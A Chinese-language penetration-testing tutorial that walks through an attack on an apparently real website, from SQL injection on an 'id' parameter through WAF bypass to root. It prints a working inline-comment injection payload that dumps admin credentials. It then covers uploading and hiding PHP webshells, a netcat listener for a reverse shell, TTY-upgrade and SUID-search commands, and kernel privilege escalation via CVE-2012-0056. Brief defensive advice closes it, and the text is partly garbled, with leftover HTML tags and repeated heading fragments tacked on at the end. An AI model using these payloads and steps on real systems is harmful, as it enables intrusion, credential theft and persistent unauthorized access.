SQL注入到Root权限获取实战教学文档<\/h1>

0x00 概述<\/h2>
本教学文档详细记录了一个从SQL注入开始，最终获取目标系统root权限的完整渗透测试过程。攻击链包括：前台SQL注入、WAF绕过、后台文件上传、反弹shell建立、交互式shell升级和内核漏洞提权。<\/p>

0x01 信息收集阶段<\/h2>

目标识别<\/strong>：

收集到目标的主站、邮件服务器和DNS服务器<\/li>
选择从主站作为初始攻击入口<\/li> <\/ul> <\/li> <\/ol>
0x02 漏洞挖掘与利用<\/h2>
1. SQL注入发现与验证<\/h3>

发现注入点<\/strong>：<\/p>

在URL参数中发现可疑的id<\/code>参数：\/index.php?id=125<\/code><\/li> <\/ul> <\/li>
验证注入类型<\/strong>：<\/p> id=125 and 1=0<\/code> → 页面变空白<\/li> id=125 and 1=1<\/code> → 页面恢复正常<\/li> 确认存在数字型注入（无需注释符）<\/li> <\/ul> <\/li> 确定列数<\/strong>：<\/p> id=125 order by 7<\/code> → 页面正常<\/li> id=125 order by 8<\/code> → 页面报错<\/li> 确认查询返回7列<\/li> <\/ul> <\/li> <\/ol> 2. WAF绕过技术<\/h3> WAF检测<\/strong>：<\/p> id=125 union select 1,2,3,4,5,6,7<\/code> → 页面无响应（被WAF拦截）<\/li> <\/ul> <\/li> 逐步测试绕过<\/strong>：<\/p> id=125 union<\/code> → 页面报错（未过滤"union"）<\/li> id=125 union select<\/code> → 无响应（过滤"select"或"union select"）<\/li> 大小写混用id=125 union sElecT<\/code> → 仍被拦截<\/li> 内联注释id=125union \/*!sElecT*\/<\/code> → 绕过成功（页面报错）<\/li> <\/ul> <\/li> 最终绕过payload<\/strong>：<\/p> id=<\/span>0<\/span>\/**\/<\/span>UniOn<\/span>\/**\/\/*!50000sEleCt*\/<\/span>1<\/span>,2<\/span>,3<\/span>,4<\/span>,group_concat(concat_ws('@'<\/span>,username,pwd)separator '<br>'<\/span>),6<\/span>,7<\/span>\/**\/<\/span>From<\/span>\/**\/<\/span>admin<\/span> <\/span><\/span><\/code><\/pre> 使用空格混淆(\/**\/<\/code>)和内联注释(\/*!50000sElecT*\/<\/code>)<\/li> concat_ws<\/code>函数合并列结果，group_concat<\/code>合并行结果<\/li> <\/ul> <\/li> <\/ol> 3. 后台入侵<\/h3> 后台发现<\/strong>：<\/p> 在域名后添加\/admin<\/code>发现后台入口<\/li> 使用注入获取的凭证登录<\/li> <\/ul> <\/li> 文件上传漏洞利用<\/strong>：<\/p> 找到编辑器功能的上传点<\/li> 无后缀限制和内容检测，直接上传PHP webshell<\/li> 真实上传路径发现：图片查看404 → 检查编辑器框架源代码<\/li> 发现\/uploadfiles<\/code>目录存放原始文件（非\/resizeimage<\/code>缩略图目录）<\/li> <\/ul> <\/li> <\/ul> <\/li> Webshell管理<\/strong>：<\/p> 使用蚁剑连接成功<\/li> 在隐蔽目录部署备用webshell并删除原始webshell<\/li> <\/ul> <\/li> <\/ol> 0x03 反弹Shell建立<\/h2> 1. 反弹Shell准备<\/h3> 环境准备<\/strong>：<\/p> 关闭VPS防火墙<\/li> 在VPS上使用nc -lvnp 9999<\/code>监听<\/li> <\/ul> <\/li> 写入反弹脚本<\/strong>：<\/p> 通过webshell上传Python反弹脚本<\/li> <\/ul> <\/li> <\/ol> 2. 交互式Shell升级<\/h3> 初始Shell限制<\/strong>：<\/p> HTTP协议无状态，提权后无法保持<\/li> 无法执行交互性工作和su<\/code>命令<\/li> <\/ul> <\/li> 完全交互式Shell建立<\/strong>：<\/p> $ python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span>[<\/span>Ctrl+Z]<\/span> <\/span><\/span># 在本地终端执行：<\/span> <\/span><\/span>$ stty raw -echo <\/span><\/span>$ fg <\/span><\/span># 返回反弹shell：<\/span> <\/span><\/span>$ reset <\/span><\/span>$ export SHELL=<\/span>bash <\/span><\/span>$ export TERM=<\/span>xterm-256color <\/span><\/span>$ stty rows <行数> columns <列数> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x04 权限提升<\/h2> 1. SUID提权尝试<\/h3> 查找SUID文件<\/strong>： find \/ -perm -4000 -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre> 检查带有s标志位的文件<\/li> 尝试使用ping<\/code>命令提权失败<\/li> <\/ul> <\/li> <\/ol> 2. 内核漏洞提权<\/h3> 利用CVE-2012-0056<\/strong>：成功获取root权限<\/li> <\/ul> <\/li> <\/ol> 0x05 攻击链总结<\/h2> 完整攻击路径：<\/p> 前台SQL注入 → 2. WAF绕过 → 3. 后台凭证获取 → 4. 文件上传漏洞利用 → 5. Webshell部署 → 6. 反弹Shell建立 → 7. 交互式Shell升级 → 8. 内核漏洞提权<\/li> <\/ol> 0x06 防御建议<\/h2> SQL注入防护<\/strong>：<\/p> 使用参数化查询<\/li> 实施严格的输入验证<\/li> 最小权限原则配置数据库账户<\/li> <\/ul> <\/li> WAF配置<\/strong>：<\/p> 更新规则库<\/li> 监控绕过尝试<\/li> <\/ul> <\/li> 文件上传安全<\/strong>：<\/p> 严格限制上传文件类型<\/li> 检查文件内容<\/li> 存储在非web可访问目录<\/li> <\/ul> <\/li> 系统加固<\/strong>：<\/p> 及时更新内核补丁<\/li> 移除不必要的SUID权限<\/li> 限制交互式Shell功能<\/li> <\/ul> <\/li> 监控与响应<\/strong>：<\/p> 日志审计<\/li> 异常行为检测<\/li> 定期渗透测试<\/li> <\/ul> <\/li> <\/ol> 附录：关键技术点<\/h2> MySQL内联注释绕过<\/strong>：\/*!50000SELECT*\/<\/code><\/li> 反弹Shell升级技术<\/strong>：pty\/spawn + stty组合<\/li> PostgreSQL提权参考<\/strong>：CVE-2019-9193<\/li> SUID提权检查命令<\/strong>：find \/ -perm -4000<\/code><\/li> 常用信息收集表<\/strong>：information_schema<\/code><\/li> <\/ol>

SQL注入到Root权限获取实战教学文档<\/h1>

0x00 概述<\/h2> 本教学文档详细记录了一个从SQL注入开始，最终获取目标系统root权限的完整渗透测试过程。攻击链包括：前台SQL注入、WAF绕过、后台文件上传、反弹shell建立、交互式shell升级和内核漏洞提权。<\/p>

0x02 漏洞挖掘与利用<\/h2>

0x03 反弹Shell建立<\/h2>

0x04 权限提升<\/h2>

0x00 概述<\/h2>
本教学文档详细记录了一个从SQL注入开始，最终获取目标系统root权限的完整渗透测试过程。攻击链包括：前台SQL注入、WAF绕过、后台文件上传、反弹shell建立、交互式shell升级和内核漏洞提权。<\/p>